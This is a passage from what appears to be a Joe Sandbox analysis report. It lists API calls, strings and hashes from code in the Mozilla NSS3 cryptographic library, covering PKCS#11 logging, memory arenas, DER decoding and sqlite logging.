                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CA60C8D
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60C9C
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60CD1
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA60CEC
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60CFB
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA60D16
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CA60D26
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60D35
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CA60D65
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CA60D70
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA60D90
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: free.MOZGLUE(00000000), ref: 6CA60D99
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C982D3B
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA60BAB
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60BBA
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60D7E
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C982D54
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA60BCB
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: EnterCriticalSection.KERNEL32(?), ref: 6CA60BDE
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60C16
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                              • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                                                                              • API String ID: 420000887-1567254798
                                                                                                                                                                                                                              • Opcode ID: 4abd0c1d35ddd4d5b5cff93d1ee45e35aa1ffae594af3dcf7780bd8dcccfb6fc
                                                                                                                                                                                                                              • Instruction ID: 49af8bccaf295cc4425e6a2361a4cfffc08fac642815fce675d60944f4078178
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4abd0c1d35ddd4d5b5cff93d1ee45e35aa1ffae594af3dcf7780bd8dcccfb6fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D213A76202241EFDB049F50EE4CA457FB6FB5231DF04C621E90897A32D730C88ACB65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6C9C4DCB
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C9C4DE1
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C9C4DFF
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C9C4E59
                                                                                                                                                                                                                                • Part of subcall function 6C9AFAB0: free.MOZGLUE(?,-00000001,?,?,6C94F673,00000000,00000000), ref: 6C9AFAC7
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA8300C,00000000), ref: 6C9C4EB8
                                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6C9C4EFF
                                                                                                                                                                                                                              • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C9C4F56
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9C521A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1025791883-0
                                                                                                                                                                                                                              • Opcode ID: f13c6470cf37a720da6b824022c692912ee6248f58680015d0f4c7d1da829a7c
                                                                                                                                                                                                                              • Instruction ID: 1bece8054f8f4e81de5a6f410e5846e3edce538ffc0ecf50ba3fcf6dda477063
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f13c6470cf37a720da6b824022c692912ee6248f58680015d0f4c7d1da829a7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EF18A71F0120ACBDB08CF54D8407AEB7B6BF48358F258129E915AB781E775E981CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(6C9C2C2A), ref: 6C9C0C81
                                                                                                                                                                                                                                • Part of subcall function 6C9ABE30: SECOID_FindOID_Util.NSS3(6C96311B,00000000,?,6C96311B,?), ref: 6C9ABE44
                                                                                                                                                                                                                                • Part of subcall function 6C998500: SECOID_GetAlgorithmTag_Util.NSS3(6C9995DC,00000000,00000000,00000000,?,6C9995DC,00000000,00000000,?,6C977F4A,00000000,?,00000000,00000000), ref: 6C998517
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C9C0CC4
                                                                                                                                                                                                                                • Part of subcall function 6C9AFAB0: free.MOZGLUE(?,-00000001,?,?,6C94F673,00000000,00000000), ref: 6C9AFAC7
                                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C9C0CD5
                                                                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C9C0D1D
                                                                                                                                                                                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C9C0D3B
                                                                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C9C0D7D
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C9C0DB5
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C9C0DC1
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6C9C0DF7
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C9C0E05
                                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C9C0E0F
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C977F4A,00000000,?,00000000,00000000), ref: 6C9995E0
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C977F4A,00000000,?,00000000,00000000), ref: 6C9995F5
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C999609
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C99961D
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: PK11_GetInternalSlot.NSS3 ref: 6C99970B
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C999756
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: PK11_GetIVLength.NSS3(?), ref: 6C999767
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C99977E
                                                                                                                                                                                                                                • Part of subcall function 6C9995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C99978E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3136566230-0
                                                                                                                                                                                                                              • Opcode ID: d342dd1b7cbae0795fdd17c7e8312a1e1a57004702d547770ee854922058ce93
                                                                                                                                                                                                                              • Instruction ID: 4033eaa208a818f07ebca8d1bac4d10ec9bc3c7c030804549281fd1ce5222fc4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d342dd1b7cbae0795fdd17c7e8312a1e1a57004702d547770ee854922058ce93
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B41A1F1A01346ABEB009F64AC45BAF7678AF2430CF144124E9196B741E735EA58CBE3
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C8D24EC
                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C8D2315), ref: 6C8D254F
                                                                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C8D2315), ref: 6C8D256C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C8D24F4, 6C8D2557
                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C8D2566
                                                                                                                                                                                                                              • API called with finalized prepared statement, xrefs: 6C8D2543, 6C8D254D
                                                                                                                                                                                                                              • bind on a busy prepared statement: [%s], xrefs: 6C8D24E6
                                                                                                                                                                                                                              • misuse, xrefs: 6C8D2561
                                                                                                                                                                                                                              • API called with NULL prepared statement, xrefs: 6C8D253C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                                                                                                                                                              • API String ID: 632333372-2222229625
                                                                                                                                                                                                                              • Opcode ID: d142a1eb70b0345ded195136f0a9d272807acf61598f8d4dd30feb989d392174
                                                                                                                                                                                                                              • Instruction ID: 13a6d8ac61c29066e560ca195beddb82f8c54b8be90d72e2399c4fade7f50e67
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d142a1eb70b0345ded195136f0a9d272807acf61598f8d4dd30feb989d392174
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D441E1717006018BE7249F19E9A8B6777B6BF8131AF164D2CE8055BB40DB3AFC46C791
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_DigestInit), ref: 6C986C66
                                                                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C986C94
                                                                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C986CA3
                                                                                                                                                                                                                                • Part of subcall function 6CA6D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA6D963
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6C986CB9
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C986CD5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                              • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                                                                                                              • API String ID: 1003633598-3690128261
                                                                                                                                                                                                                              • Opcode ID: 835f0ff183a2cd214ff09c0ae3a2875a3358d9c20b452f9d9f5ca527ef0b3642
                                                                                                                                                                                                                              • Instruction ID: 1ab46863bc446265210733b827104152cc8441d5e034b40498cf0788479b4273
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 835f0ff183a2cd214ff09c0ae3a2875a3358d9c20b452f9d9f5ca527ef0b3642
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 722136716022059FDB049F55AE48B8A7BB5EB5231CF048425E509AFB21DB30D88DC7A9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,6C957D8F,6C957D8F,?,?), ref: 6C956DC8
                                                                                                                                                                                                                                • Part of subcall function 6C9AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C9AFE08
                                                                                                                                                                                                                                • Part of subcall function 6C9AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C9AFE1D
                                                                                                                                                                                                                                • Part of subcall function 6C9AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C9AFE62
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C957D8F,?,?), ref: 6C956DD5
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B10F3
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: EnterCriticalSection.KERNEL32(?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B110C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1141
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PR_Unlock.NSS3(?,?,?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B1182
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: TlsGetValue.KERNEL32(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B119C
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA78FA0,00000000,?,?,?,?,6C957D8F,?,?), ref: 6C956DF7
                                                                                                                                                                                                                                • Part of subcall function 6C9AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA818D0,?), ref: 6C9AB095
                                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C956E35
                                                                                                                                                                                                                                • Part of subcall function 6C9AFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C9AFE29
                                                                                                                                                                                                                                • Part of subcall function 6C9AFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C9AFE3D
                                                                                                                                                                                                                                • Part of subcall function 6C9AFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C9AFE6F
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C956E4C
                                                                                                                                                                                                                                • Part of subcall function 6C9B10C0: PL_ArenaAllocate.NSS3(?,6C958802,00000000,00000008,?,6C94EF74,00000000), ref: 6C9B116E
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA78FE0,00000000), ref: 6C956E82
                                                                                                                                                                                                                                • Part of subcall function 6C956AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C95B21D,00000000,00000000,6C95B219,?,6C956BFB,00000000,?,00000000,00000000,?,?,?,6C95B21D), ref: 6C956B01
                                                                                                                                                                                                                                • Part of subcall function 6C956AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C956B8A
                                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C956F1E
                                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C956F35
                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA78FE0,00000000), ref: 6C956F6B
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,6C957D8F,?,?), ref: 6C956FE1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 587344769-0
                                                                                                                                                                                                                              • Opcode ID: 30892eff0f84eebdbef4175b874f436d3325f0b356421feea16133c49ff8b463
                                                                                                                                                                                                                              • Instruction ID: 505c11f4729f6718388158eefc3089d88e1ce45948228e7dda012569d1c9ace5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30892eff0f84eebdbef4175b874f436d3325f0b356421feea16133c49ff8b463
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38717171E106469FEB00CF55CD40BAABBA8BF65308F554229EC48D7B11F771EAA4CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C97AB7F,?,00000000,?), ref: 6C974CB4
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6C97AB7F,?,00000000,?), ref: 6C974CC8
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,6C97AB7F,?,00000000,?), ref: 6C974CE0
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,6C97AB7F,?,00000000,?), ref: 6C974CF4
                                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?,?,6C97AB7F,?,00000000,?), ref: 6C974D03
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6C974D10
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: TlsGetValue.KERNEL32 ref: 6C9FDD8C
                                                                                                                                                                                                                                • Part of subcall function 6C9FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9FDDB4
                                                                                                                                                                                                                              • PR_Now.NSS3(?,00000000,?), ref: 6C974D26
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DC6
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA60A27), ref: 6CA19DD1
                                                                                                                                                                                                                                • Part of subcall function 6CA19DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CA19DED
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C974D98
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C974DDA
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C974E02
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
